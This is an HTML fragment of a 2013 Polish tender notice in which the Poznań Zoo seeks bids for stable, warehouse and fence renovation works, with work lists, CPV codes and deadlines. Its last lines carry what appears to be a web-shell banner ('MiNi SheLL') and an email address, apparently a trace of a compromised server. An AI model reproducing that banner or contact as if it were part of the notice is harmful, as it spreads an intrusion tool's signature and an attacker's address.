<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy)Jeżeli Wykonawca, polega na zasobach innych podmiotów, Zamawiający żąda: 

1. w przypadku warunku, o którym mowa w pkt. 6.1.4 - dokumentów (np.oświadczeń) dotyczących: 
a.	zakresu dostępnych wykonawcy zasobów innego podmiotu; 
b.	sposobu wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia; 
c.	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotom; 
d.	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 

Do oferty Wykonawca załącza odpowiednie pełnomocnictwa wraz z dokumentem potwierdzającym umocowanie do udzielenia pełnomocnictw, oświadczenie wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom, kosztorys ofertowy, sporządzony zgodnie z obowiązującymi przepisami prawa oraz na podstawie dokumentacji technicznej załączonej do SIWZ, kosztorys ofertowy ma wyłącznie charakter pomocniczny i nie zmienia zasad wynagrodzenia przyjętego w postępowaniu tj. wynagrodzenie ryczałtowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na następujących warunkach:

1)	warunki oraz termin płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego, 
2)	sposób wykonania przedmiotu zamówienia, w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia, 
3)	zmiany rozwiązań technicznych w dokumentacji projektowej - w uzasadnionych przypadkach (np. spowodowanych wadami dokumentacji projektowej), gdy realizacja zadania według dokumentacji projektowej powodowałaby wadliwe wykonanie przedmiotu umowy, byłaby niemożliwa lub gdy zaistniałaby, z przyczyn wynikających z dokumentacji projektowej, konieczność wstrzymania prowadzonych przez Wykonawcę robót budowlanych; dopuszcza się wprowadzenie zmian w stosunku do pierwotnej dokumentacji oraz zmianę terminu zakończenia robót budowlanych (w związku z koniecznością opracowania i uzgodnienia rozwiązań niezbędnych do właściwej realizacji robót); w umowie zostaną wprowadzone zmiany dotyczące zakresu rzeczowego dokumentacji projektowej oraz wykonanych na jej podstawie robót budowlanych oraz zmiany dotyczące terminów: zostanie określony termin opracowania zmodyfikowanej dokumentacji oraz termin zakończenia robót budowlanych,
4)	wystąpienie niekorzystnych warunków atmosferycznych - w przypadku wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne lub inne obiektywne okoliczności uniemożliwiają prowadzenie robót, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów; w umowie mogą zostać wprowadzone zmiany dotyczące terminu zakończenia robót budowlanych,
5)	zmiana zakresu robót i wynagrodzenia, jeżeli wystąpią okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia, oraz zmniejszenie wynagrodzenia,
6)	zmiana osobowa: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców wskazanych w umowie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); w umowie zostaną wprowadzone zmiany dotyczące osób lub/i podmiotów, przy pomocy których Wykonawca realizuje zamówienie oraz zmiany dotyczące zakresu rzeczowego wykonywanego przez podwykonawców, 
7)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi; zmianie może ulec termin realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zoo.poznan.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.zoo.poznan.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 10:00, miejsce: Siedziba Zamawiającego, ul. Browarna 25, 61 - 063 Poznań, Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja stajenek zwierząt kopytnych (Tomi), wilka grzywiastego i kazuara na terenie Nowego Zoo w Poznaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania nr 1:

Zakres robót budowlanych obejmuje: wymianę pokrycia dachowego z wykonaniem ocieplenia z wełny mineralnej tj. wymianę uszkodzonych elementów drewnianej więźby dachowej w stajence zwierząt kopytnych, prace dekarskie przy wymianie poszycia dachu z wymianą rynien, rur spustowych i obróbek blacharskich, przy wykonywaniu pokrycia dachu w zakresie robót modernizacyjnych znajdą się również roboty budowlane (ocieplenie stropodachu, malowanie ścian).Dachy należy kryć papą termogrzewalną SBS-em gr. 5,2 mm. Roboty malarskie obejmują dwukrotne malowanie farbą emulsyjną białą powierzchni wewnętrznych- tynków gładkich, dwukrotne malowanie farbami olejnymi uprzednio malowanych powierzchni drewnianych, dwukrotne malowanie farbą olejną brązową uprzednio malowanych elementów drewnianych.

Prace rozbiórkowe:
	-rozebranie rynien z tworzyw sztucznych,
	-rozebranie rur spustowych z tworzyw sztucznych,
	-rozebranie pokrycia dachowego z papy na deskowaniu,
	-rozebranie pokrycia z gontów,
	-rozebranie częściowe deskowania dachu z desek na styk

Prace blacharskie:
`	-uzupełnienie obróbek blacharskich z blachy ocynkowanej,
	-wymiana pasów nad i pod rynnowych,
	-montaż rynien z blachy ocynkowanej,
	-montaż rur spustowych,

Roboty pokrywcze:
	-wykonanie nowego deskowania z desek o gr.25 mm,
	-ułożenie podkładu z papy podkładowej w miejscach wymiany deskowania,
	-pokrycie całości dachu  papą termozgrzewalną SBS -em gr. 5,2 mm,
	-pokrycie  gontami papowymi połaci dachu od strony wybiegu,

Prace nad konstrukcją dachu:
	-naprawa uszkodzonych elementów konstrukcyjnych wiązarów deskowych poprzez 	wzmocnienie dodatkowymi elementami z desek,

Prace wykończeniowe i izolacyjne:
	- wymiana połaci zniszczonego sufitu, wykonanie nowego pokrycia płytą OSB,
	- wykonanie  ocieplenia stropodachu płytami z wełny mineralnej  gr.100mm,
	- malowanie całości  pomieszczeń od wewnątrz, dwukrotnie farbami emulsyjnymi,
	- malowanie elewacji zewnętrznej, 
	- wykonanie kominków wentylacyjnych do wentylacji pomieszczeń.

Zgodnie z dokumentacją techniczną stanowiącą załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.40.00.00-1, 45.20.00.00-9, 45.44.21.00-8, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> modernizacja magazynu głównego na terenie Nowego Zoo w Poznaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót budowlanych obejmuje roboty budowlane związane z modernizacją Magazynu Głównego i adaptacją wiaty magazynowej na terenie Nowego Zoo:
                   
            Prace  pokrywcze Magazynu Głównego:
           - zdemontowanie poziomej instalacji odgromowej na dachu,
	-  naprawienie istniejącego pokrycia dachowego przez wyrównanie i wstawienie łat z papy,
	- oczyszczenie podłoża pod nowe pokrycie,
	- wykonanie nowego  pokrycia dachowego  z papy termozgrzewalnej 
 	  SBS grub.5,2 mm wierzchniego krycia na istniejącym podłożu ,
	- wykonanie obróbek blacharskich na murkach ogniowych,
-	założenie na dachu zdemontowanej instalacji odgromowej.

	Termo modernizacja ścian świetlika :
           - rozebranie istniejącej zniszczonej stolarki okiennej ścian świetlika
	 od strony stawu i parkingu,
-	wykonanie konstrukcji z desek grub.25 mm lub łat 4x4 cm w miejscu
	rozebranej stolarki okiennej, pod montaż blach trapezowych,  
     - wykonanie ocieplenia ścian świetlika ze styropianu EPS 70 grub. 15 cm,
-	wykonanie montażu blach trapezowych powlekanych o przetłoczeniach T- 10 
	mm ścian bocznych świetlika na wys. 1,40 m ,
	     
           Posadzka Magazynu Głównego: (komunikacja)
     -  rozebranie istniejącej posadzki betonowej,
-	usunięcie z budynku gruz poza obręb magazynu,
-	wykorytowanie i wyrównanie podłoża,
-	wykonanie warstwy odsączającej grub.10 cm z piasku,
-	wykonanie podbudowy z gruzu po skutej posadzce,
-	wykonanie podłoża posadzkowego z betonu B-15 grub.10 cm na ustabilizowanej 
	warstwie gruzu, 
     - zagruntowanie środkiem gruntującym warstwy pod posadzkowej,
-	wykonanie warstwy wygładzającej z zaprawy,
                     
            Stolarka :
-	wymiana zniszczonej stolarki 3- ech bram wjazdowych - ściana szczytowa
	zachodnia i wschodnia,
-	wykucie ościeżnic drzwi wejściowych do magazynu ściana szczytowa
	wschodnia,
-	wykucie ościeżnicy drewnianej okiennej - ściana szczytowa wschodnia,
-	montaż drzwi stalowych wejściowych do magazynu,
-	osadzenie stolarki okiennej z profili PCV,
                  
            Prace elewacyjne :
-	zdemontowanie  do dalszego użytku obróbek blacharskich (rury spustowe),
-	zdemontowanie instalacji odgromowej na ścianach,
-	skucie odspojonych od podłoża ścian luźnych tynków,
-	oczyszczenie podłoża ścian ,

Tynki:
-	uzupełnienie nowych tynków cementowo-wapiennych III kat,
-	zagruntowanie powierzchni ścian środkiem gruntującym,
-	wykonanie tynku o strukturze baranka o uziarnieniu 2 mm,
-	pomalowanie farbą silikatową tynki fakturowe elewacji,
-	założenie zdemontowanych rury spustowych od strony południowej,
-	założenie zdemontowanej pionowej instalacji odgromowej na ścianach,          
	
           Adaptacja  wiaty  przy  Magazynie  Głównym :
	
           -  rozebranie skorodowanej konstrukcji wiaty,
-	wykonanie i zamontowanie  konstrukcji  stalowej wiązarów wg. załączonej
	dokumentacji , 
     - wykonanie i zamontowanie konstrukcji  nośnej - słupów z kształtowników
       zamkniętych 90x90x3 wg dokumentacji,
-	wykonanie  stop fundamentowych,          
     -  zamontowanie łat  60 x80 mm co 20 cm pod pokrycie dachowe,
-	pokrycie wiaty blachą trapezową  powlekaną o przetłoczeniach trapezowych T - 20 mm,
     - ułożenie kalenicy prostej ,
          -  osiatkowanie z trzech stron ściany wiaty  siatką oc. powlekaną o oczkach
	50x50 mm,
-	umocowanie w ścianie tylnej siatki do słupka ogrodzeniowego,     
           - oczyszczenie elementów stalowe konstrukcji szczotką stalową do III-go stopnia,
-	 pokrycie całości konstrukcji powłokami antykorozyjnymi i pomalowanie farbą
       zewnętrznego stosowania,
-	wykorytowanie powierzchni na całej szerokości jezdni,
-	wyprofilowanie i zagęszczenie podłoża,
-	wykonanie warstwy odsączającej grub.10 cm,
-	ułożenie kostki betonowej grub.6 cm (szara)na podsypce cem.-piaskowej,
-	wykonanie ławy cementowo -piaskowej pod ułożenie obrzeży trawnikowych
-	ułożenie obrzeży trawnikowych,

Zamontowanie wewnątrzzakładowej stacji paliw na posadzce wiaty, wg typu ustalonego przez inwestora


Zgodnie z dokumentacją techniczną stanowiącą załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.11.00-9, 45.11.12.20-6, 45.11.13.00-1, 45.11.12.00-0, 45.20.00.00-9, 45.26.23.00-4, 45.26.25.00-6, 45.40.00.00-1, 45.40.00.00-4, 45.44.21.00-8, 45.44.22.00-9, 45.44.23.00-0, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> renowacja terenu wokół Starego Zoo w Poznaniu - etap I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty dotyczą renowacji ogrodzenia wokół Starego Zoo w Poznaniu, zlokalizowanego przy ulicy Zwierzynieckiej 19 w Poznaniu.  Zakres robót budowlanych obejmuje renowację i przebudowę ogrodzenia od strony ul. Bukowskiej -część południowa ogrodzenia od przęsła 1 do 59 (remont) i 1n-25n (odbudowa) przy ul. Bukowskiej, renowację i przebudowę ogrodzenia od strony ul. Gajowej -część wschodnia ogrodzenia od przęsła 5 do 35 przy ul. Gajowej, przebudowę ogrodzenia od strony ul. Zwierzynieckiej -fragment części północnej ogrodzenia od przęsła 32n do 79n przy ul. Zwierzynieckiej (od budynku toalet do istniejących historycznych przęseł przy budynku bramy wejściowej, wraz z renowacją stalowych bram wejściowych i napisu Ogród Zoologiczny).

Roboty rozbiórkowe i demontażowe: 
- Rozbiórka fragmentów ogrodzenia przy ul. Zwierzynieckiej, ul. Gajowej oraz całego ogrodzenia od strony ul. Bukowskiej,
- Obniżenie ścianki pomiędzy słupkami przy ul. Gajowej,
- Demontaż istniejących krat ogrodzeniowych,
- Demontaż czap betonowych zwieńczających słupy, 
- Wykonanie wykopu pod fundamenty,
- Wywóz materiałów z rozbiórki z opłatą wysypiskową i opłatą utylizacyjną,

Roboty przygotowawcze i ziemne: 
- zebranie warstwy humusu z wywiezieniem poza teren inwestycji, 
- wykonanie wykopów liniowych z wywozem urobku, 
- zasypanie wykopów piaskiem dowiezionym, 
- zabezpieczenie wykopu przed opadami i ewentualne odwodnienie wykopu,

Roboty żelbetowe i betonowe:
- wykonanie betonów monolitycznych: 
- wykonanie ław i stóp fundamentowych, 
- wykonanie słupów żelbetowych, 
- wykonanie czap betonowych zwieńczających słupy oraz nakryw betonowych na podmurówce, 
- osadzenie w betonie okuć, kotew, marek, dylatacji,

Roboty zbrojarskie obejmujące wykonanie zbrojenia: 
- ław i stóp fundamentowych, 
- słupów żelbetowych, 
- osadzenie w betonie okuć, kotew, marek, dylatacji, 

Roboty murowe:
-wykonanie podmurówki z bloczków betonowych gr. 25 cm 
- wymurowanie ścian z bloczków silikatowych kl.15 gr. 18 cm pomiędzy słupami przy ul. Gajowej, 

Roboty instalacyjne 
- wykonanie izolacji przeciwwilgociowej fundamentów ogrodzenia i podmurówki z bloczków betonowych,

Budowa ogrodzenia od strony ulicy Zwierzynieckiej oraz Bukowskiej.
 W ramach prac przewiduje się: 
- rozbiórkę fragmentu historycznego muru od strony ulicy Zwierzynieckiej (od budynku toalet w kierunku wschodnim z wyłączeniem przęseł przy bramie wejściowej), 
- rozbiórkę istniejącego ogrodzenia z siatki od strony ul. Zwierzynieckiej oraz Bukowskiej wraz z podmurówką, 
- wywóz gruzu i innych odpadów, 
- deskowanie konstrukcji żelbetowej fundamentów oraz słupów nowego ogrodzenia, 
- transport, składowanie oraz przygotowanie, wygięcie, przycięcie i łączenie prętów stalowych zbrojenia słupów oraz fundamentów, montaż zbrojenia elementów żelbetowych, 
- wykonanie hydroizolacji, 
- wylanie ław fundamentowych i słupów z betonu monolitycznego B-20, 
- wykonanie podmurówki z bloczków betonowych, 
- wykonanie i nałożenie nakryw betonowych na zwieńczeniach słupów i podmurówki, 
- nałożenie tynku mineralnego, 
- malowanie farbą akrylową, 
- wykonanie oraz przygotowanie do montażu (w tym malowanie) stalowych krat ogrodzeniowych, 

Roboty tynkarskie zewnętrzne: 
- wykonanie tynku mineralnego na murach, 
- wykonanie tynku mineralnego na elementach żelbetowych, 
- wykonanie tynku mineralnego na elementach betonowych, 

Roboty malarskie:
- naniesienie koloru na zewnętrzny tynk mineralny 
- pomalowanie elewacji budynków gospodarczych, w których nie przewidziano zdejmowanie istniejących tynków, 
- zabezpieczenie antykorozyjne elementów stalowych, 
- pomalowanie elementów stalowych,

Roboty remontowe:
- demontaż krat stalowych, 
- renowacja i przebudowa krat stalowych, 
- demontaż zwieńczeń słupów, 
- wyburzenie części muru ogrodzenia o złym stanie technicznym, odbudowa muru (wylanie fundamentów i słupów, budowa podmurówki, budowa muru pomiędzy słupami, wykonanie hydroizolacji, nałożenie nakryw betonowych na zwieńczenia słupów i murów między słupami, montaż krat ogrodzeniowych),
- montaż marek do łączenia krat ogrodzeniowych, 
- uzupełnienie ubytków w murze, 
- obniżenie murów pomiędzy słupami, 
- zdjęcie istniejących tynków, 
- nałożenie nakryw betonowych na zwieńczenia słupów i murów pomiędzy słupami, 
- nałożenie tynków, 
- pomalowanie muru farbą akrylową, 
- wywiezienie gruzu,
- budynek bramy wejściowej: odnowienie historycznych bram - wypiaskowanie, pomalowanie, odnowienie napisu: Ogród Zoologiczny.


Zgodnie z dokumentacją techniczną stanowiącą załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.11.00-9, 45.11.12.20-6, 45.11.13.00-1, 45.11.12.00-0, 45.20.00.00-9, 45.22.35.00-1, 45.26.22.10-6, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.00-6, 45.30.00.00-0, 45.32.00.00-5, 45.34.20.00-6, 45.40.00.00-1, 45.40.00.00-4, 45.44.21.00-8, 45.44.22.00-9, 45.44.23.00-0, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com